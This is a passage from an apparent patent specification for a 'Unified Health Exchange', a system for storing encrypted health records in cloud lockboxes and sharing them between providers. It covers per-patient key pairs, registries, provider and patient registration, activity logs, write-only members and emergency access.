The method can be deployed in various ways to achieve the security level desired by the community of interest ranging from:

The stringent Federal Information Processing Standards 140-2 Level 4;

Rigorous civilian standards for protecting confidentiality such as Health Information Portability and Accountability Act;

The relatively low level security required for non-sensitive information and many levels in between.

The design traverses these various security levels based on:

Deploying the key master as an appliances thus keeping critical processes such as key management, encryption and decryption within a hardened environment rather than running this software on a general purpose computer;

Depth of integration with the applications;

Optional registered IP address restrictions.

The method provides a solution to integrate disparate applications within a single enterprise or across multiple enterprises by converting data in the application programming interfaces to either industry standard representations or proprietary common formats.

The design supports an approach for storing unstructured data in a key-value (object) data stores to simplify sharing and reduces the need for a relational database, yet retains the ability to transfer such information to/from relational databases.

The design supports the ability for the individual to review the contents and audit activity on his/her files.

The design provides the capability to provide a holistic view of the individual's files for individual or authorized member.

The design supports existence of multiple registries and multiple cloud lockboxes.

The design supports use of multiple encryption algorithms simultaneously from a single key master for participation in multiple community-of-interest networks.

The systems, devices, and methods of the present application are well suited to operate in any industry requiring secure storage and exchange of information. The present application will describe an exemplary embodiment in the health care industry. Of course, one of ordinary skill in the art will appreciate that the systems, devices, and methods of the present application will have applicability in other industries, such as the legal service industry and the real estate industry, for example.

Recently, the storage requirements with respect to patient files and the Federal mandates to share records with other health care providers and with patients have presented daunting problems for those in the health care industry. The exemplary systems and methods described herein, generally referred to as a unified health exchange ("UHE"), may be used to solve many of the problems created by the increased storage and usage demands in the industry. The operation of the overall mechanism of the UHE will be described with particular applicability to the health care industry. In the health care application of the design consider the correspondence in the following Table I.



TABLE I

| Generalized | Health Care Specific |
|---|---|
| System and Method for Securely = Storing and Sharing Information | Unified Health Exchange |
| Registry = | Health Information Exchange (HIE) Registry |
| Member = | Health Care Provider, Pharmacy, Payer, Patient, etc. |
| Individual = | Patient |
| Individual's Proxy = | Health Care Provider serving as Patient's "Medical Home" |

Problems in the Health Care Industry

The UHE described herein solves critical and previously intractable challenges in the health care industry while simultaneously providing efficient use of resources and generating cost savings. Health care providers ("HCPs") face mounting expenses and downward pressure on reimbursements. Federal mandates require layers of expensive technology that increase the cost of doing business.

Increased Storage Demands

Storage demands for Electronic Health Records ("EHR") continue to expand dramatically, driven by factors including high resolution imaging data, structured and unstructured data, longitudinal care needs and regulatory retention requirements. The combination of increased demand and high cost storage results in rapidly growing IT costs for the HCPs.

Cloud services can dramatically reduce this cost, but cloud providers have been wary of the liability of storing health care records. The Unified Health Exchange solution encrypts records prior to moving them to the cloud lockboxes and the cloud lockboxes and underlying cloud providers never possess the decryption key. This combination eliminates the need for the cloud providers to conduct breach notifications, greatly diminishing their HIPAA exposure.

By relying on the cloud lockboxes for long-term record retention, the HCPs can dramatically reduce the volume and thus the cost for on-premises computer storage. By leveraging intelligent archiving, the HCPs may elect to retain onsite only the records needed in the short term. With deployment of a UHE appliance providing predictive caching, the HCPs could eliminate storage of patient files in their EHRs instead linking the underlying EHR file management to the UHE model. Further, the UHE approach can eliminate duplication of records within a single HCP as well as the duplication of records received from other health care providers.

Financially Sustainable

Existing models for health information exchange involve cumbersome hierarchies of regional, state, and national exchanges that have failed to gain traction. The financial models underpinning most HIEs do not offer a sustainable path, primarily because the current HIEs add incremental costs for HCPs at a time of great budget pressure. Health Care Providers are under increasing deadline pressure to achieve "meaningful use" of health information exchanges.

The Unified Health Exchange design enables HIE by default as a byproduct of the cost-saving storage arrangement with the cloud lockbox combined with the coordination functions of the HIE Registry. Thus the HCP saves money on storage and avoids the cost of supporting a separate HIE infrastructure.

Medical Home

The emerging "medical home" concept offers tremendous promise for coordination of care to improve wellness and reduce costs. The lack of health information exchange continues to hamper implementation of the "medical home" and

other innovations such as Accountable Care Organizations (ACOs). Unified Health Exchange consolidates patient records, offering the "medical home" a holistic picture of the patient. A "patient dashboard" may provide an easy overview of the patient's medical history and quick review of recent activity and condition.

Providers and payers struggle to identify fraud, waste, and abuse. The disparate sources of information make compiling a complete view of a patient's care difficult. Once widely adopted, Unified Health Exchange can provide a single source of information for a comprehensive utilization review.

Personal Health Records ("PHR") have been envisioned as a key technology enabling patient education and involvement. Unfortunately, early PHR efforts have failed to:

Win support from health care providers.

Gain the trust of wary consumers over privacy concerns.

The Unified Health Exchange gives patients and/or their "medical home" unprecedented control over their medical records. Because the records are encrypted with individual keys, no one can decrypt the records until authorized for that specific individual.

Computer savvy consumers are able to directly authorize an HCP to access records and also exercise the granularity to only provide permission for specific classes of information. For instance, a podiatrist may not be allowed access to a patient's cardiac records. With Unified Health Exchange, the patient decides who sees what. Further, an audit log of access gives the patient complete visibility regarding who has accessed what and when.

For patients unable or not interested in controlling their own health records, the patient's "medical home" can serve as the patient's proxy by obtaining written sign-off similar to existing HIPAA forms to manage the access on behalf of the client.

The HIPAA and HITECH rules regarding the privacy of health records have created confusion and additional costs across the US health care industry. Unified Health Exchange reduces HIPAA responsibility for cloud lockboxes by encrypting the records. For HCPs, the more of their data they move to UHE, the less vulnerability they retain.

For the EHR vendors, each of the many HIEs utilize unique interfaces to their software. UHE offers a single interface through industry standard methods to connect to what could serve as a global HIE platform.

UHE Operating Environment

Referring now to FIG. **1**, there is illustrated an example operating environment **100** of the UHE. Example environment **100** may comprise a medical home HCP **101**, an EHR system **110**, a patient portal **114**, a Key Master **112**, an HIE Registry **120**, a Cloud Lockbox **130**, and various HCPs **141**-**148**. As illustrated, a unified health exchange application programming interface, UHE API **261**, and a Key Master **112** may be integrated with medical home's HCP #1 EHR **110** to facilitate communication with HIE Registry **120**.

Further, a patient **116** may communicate with Medical Home's EHR **110** via patient portal **114**. In addition, the Patient Portal **114** could utilized mobile interfaces to provide convenient interface to the Patient **116** via web or mobile app.

In a typical operation, medical home's HCP #1 EHR **110** using the UHE API **261** and the Key Master **112** assigns a unique public-private key pair and registers patient **116** with HIE Registry **120**. The public key is provided to HIE Registry **120**, and the private key is retained by medical home **101** in the Key Master **112** as the only entity initially authorized to decrypt patient files. This activity is depicted by reference numeral **1**.

The HIE Registry **120** updates permissions directory at Cloud Lockbox **130** to authorize medical home's HCP #1 EHR **110** to write files for patient **114**. This activity is depicted by reference numeral **2**.

Medical Home's HCP #1 EHR **110** using the UHE API **261** and the Key Master **112** writes patient files encrypted with the public key to the Cloud Lockbox **130**, retaining onsite only what is needed in the short term. HCP **110** using the UHE API **261** and the Key Master **112** can retrieve files as needed for longitudinal patient care scenarios. Medical Home HCP **110** using the UHE API **261** and the Key Master **112** can also access, retrieve, and decrypt files written for patient **116** by other participating entities, such as HCPs **141**-**148**. This activity is depicted by reference numeral **3**.

Patient **116** authorizes Other HCP **141** to access files as depicted by reference numeral **4**. Medical home HCP **110** using the UHE API **261** and the Key Master **112** updates permissions in HIE Registry **120** as depicted by reference numeral **1**. HIE Registry **120** updates permissions at Cloud Lockbox **130** in routine synchronization process as depicted by reference numeral **2**. Patient **116** can also audit access to his/her files as depicted by reference numeral **4**.

Medical home's HCP #1 EHR **110** using the UHE API **261** and the Key Master **112** sends private key of patient **116** directly to Other HCP's EHR **143** using Other HCP's **141** Key Master **112** and the UHE API **261**. This exchange of private key is conducted via encrypted transmission verified with digital signatures using the respective organizations public/private key pairs. The key exchange bypasses both the HIE Registry **120** and the Cloud Lockbox **130**. This activity is depicted by reference numeral **5**.

Other HCP's EHR **143** can now retrieve, decrypt, and read files for the specific patient **116** using the patient's unique public/private key combination. Other HCP's EHR **143** can now also write files for patient **116** to same Cloud Lockbox **130** encrypted using the patient's public key. These activities are depicted by reference numeral **6**.

Participation by pharmacies **144**, depicted by reference numeral **7**, add a useful function for coordination of medication regimens.

Other entities such as labs and patient telemetry providers **146** can write files encrypted with the patient's public key, but cannot retrieve or decrypt files. This reduces HIPAA liability for these entities, and such activities are depicted by reference numeral **8**.

Patient-authorized payers **148** are provided limited access to patient files. For example, payers **148** may to review metadata but not detailed file information. This activity is depicted by reference numeral **9**.

Further, patient's medical homes HCP #1 EHR **110** may securely contribute records to de-identified research databases **118**, as depicted by reference numeral **10**.

The exemplary system **100** provides a number of useful features including:

Neither Cloud Lockbox **130** nor HIE Registry **120** ever have decryption keys, reducing HIPAA liability for these entities.

HCPs **101**, **141**, **144**, **146** and **148** save resources through intelligent archiving, enabling them to retain only the files needed in the short term in expensive on-premises storage.

Reductions in record duplication within and between HCP EHRs **110**, **143** and related software **145**, **147** and **149** also saves resources.

Design supports multiple cloud lockboxes **130** and multiple HIE Registries **120**.

Design supports a "glass break" scenario for emergency access to patient files.

Design support key change process, key recovery process, file recovery process, waste/fraud/abuse detection, use of multiple encryption algorithms, and other features.

Unified Health Exchange Components

Referring now to FIG. **2**, there is illustrated a schematic block diagram further depicting operation of the UHE of FIG. **1**. Each HCP accessing the storage of Cloud Lockbox **130** may comprise or access an HIE Registry **120**. In the illustrated example, medical home's HCP #1 EHR **110** utilizes UHE API **261** and Key Master **112** and secondary HCP #2 **141** utilizes UHE API **261** and Key Master **112**. The HIE Registry **120** provides the mechanisms and trust relationships for verifying unique identities, creating and updating patient-to-HCP and patient-to-cloud lockbox associations, and modifying permissions tables. Each HCP communicates with its associated HIE Registry **120** for patient identity matching to minimize duplication. Each HIE Registry **120** also retains mappings of public keys for patients, HCPs, payers and any other entities involved in UHE. Each HIE Registry **120** also catalogs authorized IP addresses for participating components for all participants.

Although a single Cloud Lockbox **130** is depicted in the example embodiment, it should be clear to those of ordinary skill in the art that multiple cloud lockboxes and/or multiple cloud storage servers may be employed. The cloud lockboxes, such as Cloud Lockbox **130**, offer low cost, yet responsive storage for the HCPs Encrypted EHR files **210**, which may include file metadata used for the indexing, searching, and features. The cloud lockboxes also retain a Permissions Directory **212** derived from the HIE Registry **120** for determining the mapping of which HCPs can read files for specific patients.

Each of the UHE API **261** comprises software integrated with the HCPs' Electronic Health Record ("EHR") system. The UHE API **261** communicates with the API Engine **260** in the Key Master **112**. In turn, the API Engine **260** communicates with the Key Manager and File Broker **262**, also a component of the Key Master **112**. The API Engine **260** provides a variety of interface options and policy enforcement function. Together these software modules cooperate with the HCP EHRs for issuing and/or managing patient public-private key combinations, interacting with the HIE registries and for reading/writing of files to the cloud lockbox(s). Each Key Master **112** also manages private key exchanges with other HCPs.

The UHE API **261** and the API Engine **260** may also convert proprietary data formats into standards-based formats. Likewise, when reading files from the cloud storage, the key master would convert standardized formats into proprietary formats for local EHR use.

It should be appreciated that the Key Master **112** can be implemented as hardware, software, or a combination of both hardware and software. For example, the Key Master **112** can be implemented, preferably, as a stand-alone appliance that can be inserted and integrated into an existing system architecture. In another example, the Registry & cloud Interface **112** can be implemented or installed onto a computer or other hardware identified and configured by a user. Such a computer may be a dedicated computer, for example, or may share resources between two or more applications or computing processes. A computer may be a suitable computing device having memory and a processor, and capable of storing program instructions in memory and executing the program instructions stored in memory using the processor.

Public Key Encryption and Digital Signatures

In a proxy operation of the design, the patient **116** selects one HCP, HCP **101** in the illustrated embodiment, to serve as his/her "medical home." This medical home HCP #1 EHR **110** using UHE API **261** and Key Master **112** generates a unique pair of encryption keys using a public-private key combination for the patient. The public key is shared with the HCP #1 EHR **110** but the private key is retained only in the Key Manager and File Broker **262** component of the Key Master **112**. This activity is depicted by reference numeral **2**.

The "public key" would not actually be shared with the general public, but rather it would be shared among HCPs participating in the HIE for file encryption and as a mechanism for identifying the unique patient **116**. The public key would also be appended as unencrypted transactional metadata to the files, linking the file to the patient.

The private key, retained by the medical home, would be used to decrypt the data. The Cloud Lockbox would not have the ability to decrypt the files. Only HCPs authorized by the patient would receive the patient's private key,

HCPs, cloud lockboxes, and HIE registries also have organization-specific public-private keys utilized for secure communications and digital signatures among registrants.

All communications and updates among entities may be secured through digital signatures and encryption including exchanges between Cloud Lockbox **130** and HIE Registry **120**, exchanges between Cloud Lockbox **130** and Key Master **112**, between Key Masters **112** of different HCPs, between UHE API **261** and API Engine **260**.

IP Address Restrictions

In one example, within a given HCP, communications among components of the UHE and EHRs are restricted to known machine IP addresses to further increase security. Between HCPs, cloud lockboxes, and HIE registries, all communications may also be restricted to known machine IP address to further increase security. In particular, an accepted IP addresses list is maintained by the HIE Registry **120** and distributed along with public keys for these entities. When an individual patient elects to own and operate his/her own Key Master **112** as depicted in FIG. **18**, IP restrictions may also be utilized to provide one method to control access.

Unified Health Exchange Operation

The flow of the following permissions and file accesses are depicted in FIGS. **1** and **2**:

1. HCP EHR **110**, the medical home EHR of patient **116**, writes encrypted files to Cloud Lockbox **130** using UHE API **261** and Key Master **112**. This includes the UHE API **261** converting the file into a UHE-compatible format and transmitting it to the API Engine **260** in the Key Master **112**. The file may include metadata such as, but not limited to, Patient's **116** public key, type of file, and format of file (e.g. what type of reader might be required such as for PACS images). This activity is depicted by reference numeral **2**.
2. The API Engine **260** transfers the file within the Key Master **112** to the Key Manager and File Broker **262**. The Key Manager and File Broker **262** encrypts the patient's **116** file with patient's public key and transmits it to the Cloud Lockbox **130**, thus already protected in motion. The files remain encrypted at rest on cloud server of Cloud Lockbox **130**. This activity is depicted by reference numeral **3**.
3. The Key Manager and File Broker **262** within the Key Master **112** is the sole location at the Patient's Medical Home **101** where the patient's **116** public-private key pair is retained. Neither Cloud Lockbox **130** nor HIE Registry **120** nor HCP #1 EHR **110** have the patient's

private key, thus cannot decrypt files, reducing HIPAA liability. HCP EHR #1 **110** has the authority to retrieve and decrypt the Patient's **116** files, but in order to do so must process the request through the Key Master **112** in which the private keys are retained in the Key Manager and File Broker **262**. Further, the permission to read and write files for the Patient **116** was initially established in the HCP and Patient registration processes detailed in sections describing FIG. **3** and FIG. **4**.

4. Upon receipt of Patient **116** file from HCP #1 **110** by Cloud Lockbox **130**, File Handler **211** creates a HCP #1 **110** specific Receptor **214** for the file. The Receptor **214**, encrypted with HCP #1's public key, includes a unique file ID, Patient's **116** public key, time-to-live settings (infinity for creator of file) and other metadata. The file ID is used by the File Handler **211** as a storage location pointer of the file in Encrypted EHR Files **210** store. The file ID will not provide a mapping to Patient **116** identity.
5. Creation by Cloud Lockbox **130** of Receptor **214** and writing of EHR File **210** is recorded in Activity Log **216** at the HIE Registry **120** for review by Patient **116** at will. This activity is depicted by reference numeral **5**. FIG. **5** explains the operation of the activity logs in detail.
6. Patient **116** authorizes Medical Home's HCP #1 EHR **110** to release records to Secondary HCP #2 EHR **141**. Authorization granted via e-signature using patient portal **114** or via signed paper form. The Patient **116** also has the option of granting access to metadata only. This activity is depicted by reference numeral **1**.
7. The Patient **116** also has the option of setting a time-to-live for files retrieved by HCP #2 **141**. The time-to-live feature limits the period of time that HCP #2 is authorized to retain the Patient's **116** files. The time-to-live setting provides another layer of privacy protection that is included in the hierarchy of levels of integration of UHE into the EHR described later. Patient **116** may be made aware of compliance with time-to-live by HCP #2 **141** or by HCP #1 **110**. Time-to-live settings for entities originating files will be set to infinity to enable use of UHE for archiving and for minimization or eventual elimination of local EHR files.
8. HCP #1 **110** using UHE API **261** and Key Master **112** updates HIE Registry **120** with additional access rights of HCP **141** to read specific patient's files. Updates may be secured through digital signature based exchanges between HCP #1 **110** and HIE Registry **120**. Selections by patient **116** of level of access, i.e. metadata only vs. full file access, time-to-live settings and other variables, also transmitted to HIE Registry **120** by HCP #1 **110**. This activity is depicted by reference numeral **4**.
9. HIE Registry **120** updates Permissions Directory **212** of Cloud Lockbox **130** granting access to Patient's **116** files to HCP #2 **141**. Selections by patient **116** of level of access, i.e. metadata only vs. full file access, time-to-live settings and other variables, also transmitted to Cloud Lockbox **130** by HIE Registry **120**. This activity is depicted by reference numeral **5**.
10. Cloud Lockbox **130** using File Handler **211** creates HCP #2 **141** specific Receptor **214** for each file of Patient **116** to which HCP #2 has been granted access. The Receptor **214**, encrypted with HCP #2's public key, includes a unique file ID, Patient's **116** public key, time-to-live settings and other metadata. The Receptor **214** includes whether the Patient **116** granted the HCP #2 **141** full access or metadata only access to the file.
11. HCP #1 **110** using UHE API **261** and Key Master **112** sends patient's private key encrypted using public key of HCP #2 **141** to HCP #2's Key Master **112**. The private key exchange process bypasses Cloud Lockbox **130** and HIE Registry **120**, thus only HCPs possess private keys. This activity is depicted by reference numeral **6**.
12. The transmission of the Patient's **116** private key is recorded to the Activity Log **111** for review by patient at will. Patient notification triggers would also be supported. This activity is depicted by reference numeral **4**.
13. In some situations, the Patient **116** may only want the HCP #2 **141** to have access to the metadata. In this case, a variation of the permission process would authorize access to the Receptors **214** but not share the Patient's private key.
14. HCP #2 EHR **141** can now write their own generated content to Cloud Lockbox **130** for the same patient **116**. For files written by HCP #2 **141**, time-to-live settings are set to infinite. This activity is depicted by reference numeral **8**.
15. HCP #2 EHR **141** can now retrieve existing patient files written by HCP #1 EHR **110**. Using the UHE API **261** and the Key Master **112**, HPC #2 EHR transmits a digitally signed request for list of Receptors for Patient **116** identifying individual based on public key of Patient **116**. Cloud Lockbox **130** responds with package of Receptors **214** for Patient **116** if authorization for access by HCP #2 **141** is already in Permissions Directory **212**. This activity is depicted by reference numeral **8**.
16. HCP #2 EHR **141**, using the UHE API **261** and the Key Master **112**, decrypts the Receptors with its own private key. HCP #2 EHR **141** can then decide which files to download based on the Receptor metadata. HCP #2 EHR **140**, using the file ID from the Receptor **214**, requests the pertinent Encrypted EHR Files **210** for Patient **116**. This activity is depicted by reference numeral **8**.
17. Access by HCP #2 **141** of Patient's **116** Receptors **214** and/or Encrypted EHR Files **210** for files written by any other entity, as well as, for instance, HCP #2 writing files to Cloud Lockbox **130** for Patient, are written to the Activity Log **216** at HIE Registry **120** for review by patient at will. Patient notification triggers would also be supported. This activity is depicted by reference numeral **5**.
18. HCP #2 **141** using UHE API **261** and Key Master **112** updates HIE Registry **120** with additional access rights of HCP #1 **110** to read patient files written by HCP #2 **141** for patient **116**. This activity is depicted by reference numeral **7**.
19. HIE Registry **120** updates permissions directory **212** of Cloud Lockbox **130**, adding access for HCP #1 **110** to files written by HCP #2 **141** for Patient **116**. Updates may be secured through digital signature based exchanges between Cloud Lockbox **130** and HIE Registry **120**. This activity is depicted by reference numeral **5**.
20. Cloud Lockbox **130** using File Handler **211** creates HCP #1 **110** specific Receptor **214** for each file for Patient **116** to which HCP #1 has been granted access by HCP #2 EHR **141**. The Receptor **214**, encrypted with HCP #1's **110** public key, includes a unique file ID, Patient's **116** public key, time-to-live settings and other metadata.
21. HCP #1 EHR **110** also able to retrieve the files generated by HCP #2 EHR **141**. This activity is depicted by reference numeral **3**.
22. Access by HCP #1 EHR **110** of Patient's **116** Receptors **214** and/or EHR File **210** for files written by any other

entity are written to the Activity Log **216** at HIE Registry **120** for review by patient at will. Patient notification triggers would also be supported. This activity is depicted by reference numeral **5**.

Encryption Algorithm Flexibility

The UHE environment **100** described herein is designed to protect the privacy and confidentiality of electronic health records and other forms of sensitive information while also allowing such information to be securely shared with others. As such, the UHE environment **100** does not include a central key authority governing the UHE encryption. Rather, each independent Key Master **112** operates a Key Manager and File Broker **462** that generates public-private key pairs and retains the private keys.

Given the modularity and isolation of key creation, encryption, and decryption within the Key Manager and File Broker **462**, a given community-of-interest electing to use the UHE mechanism could elect to use any suitable public key encryption algorithm of its choosing without impacting the operation of the UHE environment. For example, a first key master may operate a key master and file broker using a first public key encryption algorithm while a second key master may operate a key master and file broker using a second and different public key encryption algorithm.

In one example, as illustrated in FIG. **18**, a Key Master **412** may operate multiple Key Manager and File Broker **462** modules in order to participate in multiple community-of-interest networks utilizing different encryption algorithms.

Details of the HIE Registry

Listed below are examples of the types of information which may be maintained by HIE Registry **120**. Of course, the examples listed below are not meant to be exhaustive or prescriptive, but rather merely examples of the ways in which the underlying mechanism may operate.

TABLE B

| HCP Listings<br>HCP Listings |
|---|
| Name of HCP |
| Type of HCP |
| Public Key of HCP |
| Date Registered |
| Authorization Method |
| Cloud Lockbox |
| IP Addresses |

TABLE C

| HCP Types<br>HCP Types |
|---|
| Medical Center/Hospital |
| Outpatient Clinic |
| Physician Practice |
| Home Health/Hospice |
| Pharmacy |
| Health Department |
| Lab |
| Mobile/Home Telemetry |

TABLE D

| Patient Listings<br>Patient Listings |
|---|
| Public Key of Patient |
| Public Key of Medical Home |
| Date Registered |
| Authorization Method |
| Public Keys of HCPs Authorized to Read and/or Write Records |
| Key Demographic Information for Identity Matching |
| Payer(s) |

TABLE E

| Directory of Registries<br>Directory of Registries |
|---|
| HCP-Registry Associations |
| Public Keys of Other Registries |
| IP Addresses |

The activity logs as illustrated in FIG. **5** contain transactional information to monitor access to patient's files. These include the Activity Log UHE API **111**, Activity Log File Broker **264** and Activity Log Cloud Lockbox **216**. The activity logs provide an essential cross check of file access for security purposes and also provide a rich source of information to inform the patient regarding access to and sharing of the EHR files, private key, etc.

The Cloud Lockbox

Listed below are examples of the types of information that may be stored by the Cloud Lockbox **130**. The list is not meant to be exhaustive or prescriptive, but rather an example of one way in which the underlying mechanism may operate.

- Encrypted EHR Files **210** may comprise unstructured key-value data store.
- Metadata which may be used as key for granular permissions, searching and batch retrievals may include, but is not limited to:
  - Patient's Public Key
  - HCP's Public Key
  - Date of Activity
  - File Type
  - Registry Public Key
- HCPs may write encounter summaries to Cloud Lockbox **130** that include pertinent information such as date(s) of encounter, orders, vital signs, medications, history and physical, radiology report, physicians, discharge summary and links to image files also written to Cloud Lockbox **130**. These files may adhere to industry standard formats such as HL7 and be in easily processed formats such as XML.
- The Permissions Directory **212** of patients' public keys mapped to HCPs allowed to retrieve information provides an additional level of security to the mechanism beyond the data encryption. All HCP access may be verified via digital signature.
- Receptors **214** are created for each file that an HCP is authorized to access. The Receptors **214** are encrypted with the specified HCPs public key. The Receptors include file ID, patient's public key, time-to-live settings, permissions settings, type of file, format of file (e.g. what type of reader might be required such as for PACS images) and other metadata.
- File Handler **211** provides the mapping of file ID in the Receptor to the actual storage location of the file at the Cloud Lockbox **130**. Thus the physical file location has been obfuscated, requiring the use of the File Handler **211** to retrieve files.

HCP Registration Process

Referring now to FIG. **3**, there is a schematic block diagram illustrating an HCP registration process using the UHE of FIG. **1** and FIG. **2**. An entity seeking to participate in the UHE network as a HCP Registrant **101**-R may be registered as depicted in FIG. **3**.

The HIE Registry **120** maintains database of HCPs, labs, telemetry providers, payers and any other entities that may have permission to read and/or write patient files (Registrant). As shown by reference numeral **1**, HIE Registry **120** utilizes government sources and other trusted databases to assemble and verify entries in the HIE registry database. HIE Registry **120** may also generate its own public/private key combination for itself as a corporate entity.

As shown by reference numeral **2**, a Registrant **101**-R may verify its identity and authority with the HIE Registry **120** through multi-factor identity verification and exchange of authorized IP addresses.

Once verification is completed, the Registrant **101**-R using HCP #1 EHR **110**-R, UHE API **261** and Key Master **112** generates its own public/private key combination to identify itself as a corporate entity.

As shown by reference numeral **3**, the Registrant **101**-R transmits its public key to HIE Registry **120** encrypted using the HIE registry's public key using the UHE API **261** and the Key Master **112**. HIE Registry **120** decrypts with own private key.

As shown by reference numeral **4**, HIE Registry **120** replies with an acknowledgement encrypted with its own private key. The Registrant **101**-R verifies HIE Registry **120** transmission by decrypting with HIE registry's public key using the UHE API **261** and the Key Master **112**.

As shown by reference numeral **5**, the Registrant completes registration with an acknowledgement to the HIE Registry **120** encrypted with its own private key using the UHE API **261** and the Key Master **112**. HIE Registry **120** verifies the registrant transmission by decrypting with the registrant's public key.

Patient Registration Process

Referring now to FIG. **4**, there is a schematic block diagram illustrating a patient registration process using the UHE of FIG. **1** and FIG. **2**. Once an entity is registered, as described above, it can then serve as a "Patient's Medical Home" **101** for the patient and conduct the registration process as depicted in FIG. **4**.

First, an HCP EHR #1 **110** using UHE API **261** and Key Master **112** sends identifying patient demographic information to HIE Registry **120** as shown by reference numeral **1**. The payload may be encrypted with the private key of the HCP, decrypted by the HIE Registry **120** with the HCP's public key, confirming the identity of the HCP.

Second, the HIE Registry **120** communicates to its network of HIE Registries if applicable, to verify uniqueness of patient **116** identity as shown by reference numeral **2**.

Third, the HIE Registry **120** has three possible replies as shown by reference numeral **3**:

a. EXISTS: In registry, returns patient public key, medical home public key and cloud lockbox.

b. NEW: Created listing, requests public key of patient.

c. MORE: Indicating that additional information on patient required to determine whether unique identity.

In all three cases, the response is encrypted with the HIE's private key for decryption by the HCP with the HIE registry's public key, confirming identity of the HIE registry.

Fourth, the HCP replies as shown by reference numeral **4** depending on response in received in step **2**:

a. ACKNOWLEDGE: HCP acknowledges receipt and session terminates.

b. REGISTER: HCP generates public/private key combination for patient. Transmits public key, ID of cloud lockbox and Payer(s) to HIE registry.

c. Identity confirmation process continues.

In all three cases, the response is encrypted with the HCP's private key for decryption by the HIE registry with the HCP's public key, confirming identity of the HIE registry.

Fifth, the HIE Registry **120** replies as shown by reference numeral **5** depending on response received in step **3**:

a. Session completed in step **3**.

b. HIE registry acknowledges receipt and session terminates.

c. Identity confirmation process continues.

In all three cases, the response is encrypted with HIE's private key for decryption by the HCP with the HIE registry's public key, confirming identity of the HIE registry.

Sixth, if the Patient **116** is a new patient to the HIE Registry network, then the HIE Registry **120** updates Cloud Lockbox **130** regarding registration of new Patient **116** as shown by reference numeral **6**.

Seventh, the Patient's Medical Home **101** is now able to write and read files to the Cloud Lockbox **130** for Patient **116** using the HCP #1 EHR **110**, the UHE API **261** and the Key Master **112**.

Activity Logs Mechanism for Patient Information and for Detecting and Halting Unauthorized Access

Referring now to FIG. **5**, a schematic block diagram illustrates creating and comparing Activity Logs using the UHE of FIG. **2**. Creation and comparison of Activity Logs are also supported by the example UHE environment.

An Activity Log UHE API **111**, an Activity Log File Broker **264** and an Activity Log Cloud Lockbox **216** capture information representative of writing and reading of UHE files as well as information representative of changes to access by different members. For improved security, the Activity Logs are maintained at the HIE Registry **120** separate from the sources of Activity Log records. For example, Activity Logs may be maintained in a first data store while UHE files may be maintained in a second distinct data store. An Activity Logs Compare module **280** at the HIE Registry **120** provides a method for detecting and halting unauthorized access to files. The Activity Logs also provide a record of actions for review by the Patient **116**.

Activity Log data may be obtained from one or more of a variety of sources. For example, when the UHE API **261** that is integrated with HCP #1 EHR **110** sends a file write or read request to the API Engine **260** in the Key Master **112** as depicted by reference numeral **1**, the UHE API **261** simultaneously sends a report of the request to the Activity Log UHE API **111** at the HIE Registry **120** as depicted by reference numeral **2**.

In one example, when the Key Manager and File Broker **262** in the Key Master **112** sends a file write or read request to the Cloud Lockbox **130** as depicted by reference numeral **3**, the Key Manager and File Broker **262** simultaneously sends a report of the request to the Activity Log File Broker **264** at the HIE Registry **120** depicted by reference numeral **4**.

In one example, when the File Handler **211** in the Cloud Lockbox **130** responds to a file write or read request depicted by reference numeral **3**, the File Handler **211** simultaneously sends a report of the request to the Activity Log Cloud Lockbox **216** at the HIE Registry **120** depicted by reference numeral **5**.

Periodically, the HIE Registry **120** will analyze activity logs, using Activity Log Compare module **280**, to detect

anomalies that could indicate unauthorized access to Encrypted EHR Files **210** stored at the Cloud Lockbox **130** depicted by reference numeral **6**. If such an anomaly is detected, then the HIE Registry **120** may alter the Permissions Directory **212** of the Cloud Lockbox **130** in order to halt file retrieval from the suspect Key Master **112** depicted by reference numeral **7**. In one example, a Permission Directory **212** setting may indicate to the Key Manager and File Broker **262** the reason for the denial of file retrieval depicted by reference numeral **3**. In one example, the HIE Registry **120** may also notify responsible members at the Participating HCP about the detected anomaly and denial of file retrieval. The notification may be performed via a suitable method established at the time of registration depicted by reference numeral **8**. For example, a notification may include an email message, a text message, a telephone call, a pager alert, and so on.

Even in a proxy situation, the patient **116** could also receive notification of the anomalous access and the actions taken to halt such access.

In one example, the File Handler **211**, Key Manager and File Broker **262**, and the UHE API **261** may send periodic "heartbeat" messages to HIE Registry **120** to confirm ability to communicate. In such an example, the Activity Log Compare module **280** is able to detect the absence of heartbeat entries and generate a notification accordingly.

Inclusion of Write-only-members

Referring now to FIG. **6**, there is a schematic block diagram illustrating sharing write-only data using the UHE of FIG. **1** and FIG. **2**. Receiving and sharing lab results and home/mobile telemetry is also supported by the example UHE environment.

Certain providers in the health care field provide patient data without being allowed to receive patient data. Such providers, generally referred to generally as Write-Only Members, may include participating vendors providing home or Mobile Health Monitor Software **146**A, participating labs running Lab Software **146**B and other participating entities with Write-Only Software **146**C.

Like other HCPs, these Write-Only-Members may also associate to and register with an HIE Registry **120** in the UHE network by following the entity registration process described above in reference to FIG. **3**.

By following a process similar to patient registration described in reference to FIG. **4**, the write-only Mobile Health Monitor Software **146**A, using the UPI API **261** and the Key Master **112**, may retrieve a patient's public key and the ID of Cloud Lockbox **130** from the HIE Registry **120** as depicted by reference numeral **1**. The Write-Only Participant **146**A could then commence writing files encrypted with patient's public key to Cloud Lockbox **130** as depicted by reference numeral **1**.

Only HCPs authorized by the patient would have the private key to decrypt the files written by Write-Only-Members. Write-Only-Members **146**A, **146**B and **146**C would not possess any patients' private keys nor would such participants be authorized to retrieve files from the Cloud Lockbox **130**.

"Glass Break" Emergency Care Scenario

Referring now to FIG. **7**, there is a schematic block diagram illustrating communications within the UHE environment in an emergency situation.

It is important for an HIE solution to provide emergency rooms with access to patient data in the event of an emergency that occurs outside of the patient's normal care community. The so-called "glass break" scenario outlined in the FIG. **7**, shows how such functionality may work within the UHE framework.

1. Patient **116** presents to an emergency room **610**, unable to provide authorization for access to his/her medical records depicted by reference numeral **1**. The emergency room **610** is not one of the patient's normal HCPs.
2. Emergency room **610** using ER HCP EHR **612**, UHE API **261** and Key Master **112** attempts to register patient **116** with HIE Registry **120** and, as a result, receives patient's medical home **101** public key and Cloud Lockbox **130** depicted by reference numeral **2**.
3. Emergency room **610** sends request to HCP #1 EHR **110** for emergency-based release of private key using UHE API **261** and Key Master **112**. Message to HCP **110** is encrypted with emergency room's private key. HCP **110** is able to decrypt message with emergency room's public key, verifying identity. Encrypted key exchange proceeds. These activities are depicted by reference numeral **3**.
4. HCP **110** using UHE API **261** and Key Master **112** updates permission directory **220** at HIE Registry **120** allowing access to Patient's **116** EHR files **210** stored at Cloud Lockbox **130** for ER HCP EHR **612** depicted by reference numeral **4**.
